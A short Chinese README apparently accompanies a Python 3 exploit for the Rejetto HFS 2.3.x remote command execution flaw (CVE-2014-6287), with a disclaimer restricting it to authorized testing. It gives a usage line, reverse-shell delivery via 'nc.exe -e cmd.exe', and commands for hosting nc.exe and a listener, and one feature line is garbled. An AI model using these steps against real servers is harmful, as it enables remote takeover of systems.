针对 Rejetto HTTP File Server 2.3.x(CVE-2014-6287)的远程命令执行漏洞利用工具,使用 Python 3 重写,适用于现代攻击性安全测试。
这是经典远程命令执行(RCE)漏洞利用程序的 Python 3 重写版本,目标为 Rejetto HTTP 文件服务器(HFS)v2.3.x,利用了编号为 CVE-2014-6287 的漏洞。
该漏洞最初由 Avinash Kumar Thapa(又名“-Acid”) 发现,此版本提高了可移植性和易用性,提供了完全参数化和现代兼容性。
本工具仅用于教育和授权渗透测试目的。未经授权对并非你拥有或未获明确许可的系统进行使用,是非法且不道德的。
nc.exe 的端口nc.exe 反向 shell 投递nc.exenc.exe -e cmd.exe 以建立反向 shellpython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
示例:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
要求:
- 提供 nc.exe 的 HTTP 服务器:
python3 -m http.server 8000
- 监听器:
nc -lvnp 4444